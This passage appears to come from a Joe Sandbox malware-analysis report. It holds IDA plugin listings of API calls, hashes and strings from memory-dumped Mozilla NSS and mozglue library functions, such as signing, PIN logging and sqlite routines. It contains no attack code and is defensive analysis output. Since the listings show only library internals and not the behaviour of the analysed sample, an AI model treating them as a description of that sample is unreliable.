                                                                                                                                                                                          • Instruction Fuzzy Hash: D0817EB1A00209AFDF10DF69DC85AEE7BB5BF49308F140424ED19A3B11E771E964CBA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C544D80
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C544D95
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C544DF2
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C544E2C
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C544E43
                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C544E58
                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C544E85
                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C6905A4,00000000), ref: 6C544EA7
                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C544F17
                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C544F45
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C544F62
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C544F7A
                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C544F89
                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C544FC8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                          • Opcode ID: bae438986fc6a769b6afc37bdab80a0b0b309870b126e8057a5d1b0f9db84627
                                                                                                                                                                                          • Instruction ID: 1f190f56fa8cfbf3d457bf65a43a19dd5dff77d982b1ad94f9f2ac0be14a66c9
                                                                                                                                                                                          • Opcode Fuzzy Hash: bae438986fc6a769b6afc37bdab80a0b0b309870b126e8057a5d1b0f9db84627
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E817C71948301EFE701CF69DC80B5AB7E8AB88358F14C929F959DB741E731EA05CB92
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D4F0
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D4FC
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D52A
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D530
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D53F
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D55F
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C46D585
                                                                                                                                                                                          • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C46D5D3
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D5F9
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D605
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D652
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C46D658
                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C46D667
                                                                                                                                                                                          • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C46D6A2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704117784.000000006C410000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704222004.000000006C49E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704248452.000000006C4A2000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2206442479-0
                                                                                                                                                                                          • Opcode ID: 5db5a3b2c169aa722d038a8615b85526bc2d182e7fd73ac8c4fc04bd20f09d33
                                                                                                                                                                                          • Instruction ID: 92bf1cf6cd67443a7f18501773ce8cc6f4c4a6bb206eacddd1c27036dfad1598
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5db5a3b2c169aa722d038a8615b85526bc2d182e7fd73ac8c4fc04bd20f09d33
                                                                                                                                                                                          • Instruction Fuzzy Hash: 04514D71604705DFCB14DF35C888E9ABBB5FF89318F108A2EE95A87B11DB30A945CB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C56ADE6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C56AE17
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AE29
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AE3F
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C56AE78
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C56AE8A
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C56AEA0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: L_strncpyzPrint$L_strcatn
                                                                                                                                                                                          • String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$ndl
                                                                                                                                                                                          • API String ID: 332880674-3423121467
                                                                                                                                                                                          • Opcode ID: 355d4b32de62f8be70d44d2ad47fc4177aff21a2a13e62c690093b1cd9739370
                                                                                                                                                                                          • Instruction ID: 37c9dbe5a25a7a222983e4eba59ea90c6b4f9dfd78687a70e3b5436011f438ba
                                                                                                                                                                                          • Opcode Fuzzy Hash: 355d4b32de62f8be70d44d2ad47fc4177aff21a2a13e62c690093b1cd9739370
                                                                                                                                                                                          • Instruction Fuzzy Hash: A331C535A01125EBCB00DF16DC88BAA37B5AB86309F448425E5099BF61DB349D58CB9E
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C566F16
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566F44
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566F53
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566F69
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C566F88
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C566FA1
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$ndl
                                                                                                                                                                                          • API String ID: 1003633598-3944593958
                                                                                                                                                                                          • Opcode ID: f45e3a2ead838198ea9defeda33b875b9fef13329bffbd17ec5437f9a65b9865
                                                                                                                                                                                          • Instruction ID: 2f88ee764cc22a791abf015de98733bb6e56b929516ae42b2334631bc65f8014
                                                                                                                                                                                          • Opcode Fuzzy Hash: f45e3a2ead838198ea9defeda33b875b9fef13329bffbd17ec5437f9a65b9865
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7831D535601111EFDB00DF16DC88B5A77B5EB86318F448025E508A7E25DF309D58CBDD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_InitPIN), ref: 6C562DF6
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C562E24
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C562E33
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C562E49
                                                                                                                                                                                          • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C562E68
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C562E81
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                          • String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$ndl
                                                                                                                                                                                          • API String ID: 1003633598-1310409565
                                                                                                                                                                                          • Opcode ID: c96ba3a1c8ea0933ca8c560cdf901dd8f1d932e989fb5880bbf4ccedec2c1c67
                                                                                                                                                                                          • Instruction ID: ea8b340b546c02ba0c6d510acd1f0ae8f044026704d4d137297f4e20cb5888b0
                                                                                                                                                                                          • Opcode Fuzzy Hash: c96ba3a1c8ea0933ca8c560cdf901dd8f1d932e989fb5880bbf4ccedec2c1c67
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631F175A01115EBCB009F16DC8CBAA37B5EB86318F448025E908ABF61DB309D58CBAD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C57781D,00000000,6C56BE2C,?,6C576B1D,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C40
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C57781D,?,6C56BE2C,?), ref: 6C576C58
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C6F
                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C576C84
                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C576C96
                                                                                                                                                                                            • Part of subcall function 6C521240: TlsGetValue.KERNEL32(00000040,?,6C52116C,NSPR_LOG_MODULES), ref: 6C521267
                                                                                                                                                                                            • Part of subcall function 6C521240: EnterCriticalSection.KERNEL32(?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C52127C
                                                                                                                                                                                            • Part of subcall function 6C521240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C521291
                                                                                                                                                                                            • Part of subcall function 6C521240: PR_Unlock.NSS3(?,?,?,?,6C52116C,NSPR_LOG_MODULES), ref: 6C5212A0
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C576CAA
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                          • Opcode ID: d1e09e512f63b653add356cdb31a3d2788079c6519c1cd1234d2d5adc96dcc50
                                                                                                                                                                                          • Instruction ID: c3cdadc22e6b17ddfe6c8c4382e1a5d92b89b8a0f0c148de7b12cc7f34f35222
                                                                                                                                                                                          • Opcode Fuzzy Hash: d1e09e512f63b653add356cdb31a3d2788079c6519c1cd1234d2d5adc96dcc50
                                                                                                                                                                                          • Instruction Fuzzy Hash: E401A2B17023013BEA20277A6C8AF67355CDF52158F140931FE09F1985EE96E51584BD
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C5478F8), ref: 6C584E6D
                                                                                                                                                                                            • Part of subcall function 6C5209E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C5206A2,00000000,?), ref: 6C5209F8
                                                                                                                                                                                            • Part of subcall function 6C5209E0: malloc.MOZGLUE(0000001F), ref: 6C520A18
                                                                                                                                                                                            • Part of subcall function 6C5209E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C520A33
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C5478F8), ref: 6C584ED9
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C577703,?,00000000,00000000), ref: 6C575942
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C577703), ref: 6C575954
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C57596A
                                                                                                                                                                                            • Part of subcall function 6C575920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C575984
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C575999
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C5759BA
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C5759D3
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C5759F5
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C575A0A
                                                                                                                                                                                            • Part of subcall function 6C575920: free.MOZGLUE(00000000), ref: 6C575A2E
                                                                                                                                                                                            • Part of subcall function 6C575920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C575A43
                                                                                                                                                                                          • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584EB3
                                                                                                                                                                                            • Part of subcall function 6C584820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C584EB8,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58484C
                                                                                                                                                                                            • Part of subcall function 6C584820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C584EB8,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58486D
                                                                                                                                                                                            • Part of subcall function 6C584820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C584EB8,?), ref: 6C584884
                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584EC0
                                                                                                                                                                                            • Part of subcall function 6C584470: TlsGetValue.KERNEL32(00000000,?,6C547296,00000000), ref: 6C584487
                                                                                                                                                                                            • Part of subcall function 6C584470: EnterCriticalSection.KERNEL32(?,?,?,6C547296,00000000), ref: 6C5844A0
                                                                                                                                                                                            • Part of subcall function 6C584470: PR_Unlock.NSS3(?,?,?,?,6C547296,00000000), ref: 6C5844BB
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F16
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F2E
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F40
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F6C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F80
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C584F8F
                                                                                                                                                                                          • PK11_UpdateSlotAttribute.NSS3(?,6C65DCB0,00000000), ref: 6C584FFE
                                                                                                                                                                                          • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C58501F
                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C5478F8), ref: 6C58506B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 560490210-0
                                                                                                                                                                                          • Opcode ID: eb6dae9be4fa94988bca07899d7efa945ec00637fe18b19ba04d7c617c1c7992
                                                                                                                                                                                          • Instruction ID: 3e7d81d6bda0fa3109b8a38ab9e63ebe103f46486b210f3662052465643508d5
                                                                                                                                                                                          • Opcode Fuzzy Hash: eb6dae9be4fa94988bca07899d7efa945ec00637fe18b19ba04d7c617c1c7992
                                                                                                                                                                                          • Instruction Fuzzy Hash: B751E4B1902222DBEB11AF25EC45A9B37B8EF4531CF544635EC0646B12FB31D958CAE2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 786543732-0
                                                                                                                                                                                          • Opcode ID: 324b47fe91fd58b50f2bff1ca771a2e6d49b662aff0f0c424dffca20a8c39004
                                                                                                                                                                                          • Instruction ID: 5bddcf8f3778d28f249bd35e9c210bd1bdfcd24c41d6bf0fa57516c223338c77
                                                                                                                                                                                          • Opcode Fuzzy Hash: 324b47fe91fd58b50f2bff1ca771a2e6d49b662aff0f0c424dffca20a8c39004
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4651C1B1E01216EBDF00DF59DCC16AE77F8BB46348F144525D815A3B90E339A909CBEA
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C604CAF
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604CFD
                                                                                                                                                                                          • sqlite3_value_text16.NSS3(?), ref: 6C604D44
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_value_text16$sqlite3_log
                                                                                                                                                                                          • String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
                                                                                                                                                                                          • API String ID: 2274617401-4033235608
                                                                                                                                                                                          • Opcode ID: e83ea5503e7b8082553909914df970499970c80d7bb46349f8001ce0cb88f567
                                                                                                                                                                                          • Instruction ID: 724c657143d6ad62a4a3ba982a5547bceef18cadfc2aa7302061a3a3a956dbca
                                                                                                                                                                                          • Opcode Fuzzy Hash: e83ea5503e7b8082553909914df970499970c80d7bb46349f8001ce0cb88f567
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C3168B3B04951A7D73C4A259A00BF473A17BA2319F154529D8246BE94CBE1AC62C3EF
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C424A68), ref: 6C45945E
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C459470
                                                                                                                                                                                            • Part of subcall function 6C459420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C459482
                                                                                                                                                                                            • Part of subcall function 6C459420: __Init_thread_footer.LIBCMT ref: 6C45949F
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 6C45EC84
                                                                                                                                                                                          • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C45EC8C
